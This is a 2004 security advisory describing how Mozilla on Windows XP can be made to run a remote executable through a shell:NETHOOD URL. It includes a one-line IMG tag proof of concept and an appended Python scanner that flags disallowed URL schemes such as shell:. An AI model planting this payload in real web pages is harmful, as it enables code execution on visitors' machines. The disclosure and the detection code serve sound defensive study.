SUBJ: MOZILLA: SHELL can execute remote EXE program
DATE: 2004/07/09
FROM: Liu Die Yu

############################################################
[START] Advisory
############################################################

COPYRIGHT
---------
This Advisory is Copyright (c) 2004 "Liu Die Yu".
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the author's written permission.
( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )

TESTED
------
MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616")
running on
winxp.en.home.sp1a.up2date.20040709

PROCESS
-------
VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT "shell:NETHOOD"

AT LAST, MAKE MOZILLA REQUEST THE FOLLOWING URL:
shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe

A FILE NAMED "fileid.exe" IN THE "shared" FOLDER WILL BE EXECUTED.

REFERENCE
---------
MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
greetingz fly to perrymonj.

WINDOWS support "shell:NETHOOD":
http://does-not-exist.org/mail-archives/bugtraq/msg02171.html
thanks to malware for his additional research, and Cheng Peng Su for his original discovery.

liudieyu
http://umbrella.name

############################################################
[START] PROOF OF CONCEPT
############################################################

[IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]
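
Added example, not part of the original advisory and not Mozilla's code: a Python check that a content filter or page audit could run to flag URL attributes whose scheme is outside an allowlist, such as the shell: URL in the proof of concept above. The allowlist, the attribute list and the sample HTML are assumptions constructed for illustration.

```python
# Added example, not from the advisory. Flags URL-bearing HTML attributes
# whose scheme is outside an allowlist, e.g. shell: as described above.
from html.parser import HTMLParser
import re

ALLOWED_SCHEMES = {"http", "https", "mailto"}   # assumption: local policy
URL_ATTRS = {"src", "href", "action", "background", "data", "longdesc"}
_SCHEME = re.compile(r"([a-z][a-z0-9+.\-]*):", re.IGNORECASE)
_LEADING = "".join(map(chr, range(0x21)))       # C0 controls and space

def url_scheme(value):
    """Lower-cased scheme of an attribute value, or None if it has none."""
    # Browsers drop tab/CR/LF and leading control chars before parsing,
    # so normalise the same way or " SheLL:" slips past a naive match.
    cleaned = re.sub(r"[\t\r\n]", "", value).lstrip(_LEADING)
    m = _SCHEME.match(cleaned)
    return m.group(1).lower() if m else None

class SchemeAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []   # (line, tag, attribute, scheme)

    def handle_starttag(self, tag, attrs):
        # attrs arrive with names lower-cased and character references
        # already decoded, so "sh&#101;ll:" is seen as "shell:".
        for name, value in attrs:
            if name in URL_ATTRS and value:
                scheme = url_scheme(value)
                if scheme and scheme not in ALLOWED_SCHEMES:
                    self.findings.append((self.getpos()[0], tag, name, scheme))

def audit(html_text):
    parser = SchemeAuditor()
    parser.feed(html_text)
    parser.close()
    return parser.findings

# Constructed sample page; line 3 carries the URL form from the advisory.
SAMPLE = """<html><body>
<img src="http://example.test/logo.png">
<img src="shell:NETHOOD\\shared on X-6487ohu4s6x0p\\fileid.exe">
<a href=" SheLL:NETHOOD\\x">mixed case, leading space</a>
<iframe src="sh&#101;ll:NETHOOD\\x"></iframe>
</body></html>"""

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print("line %d: <%s %s> uses disallowed scheme %r" % finding)
```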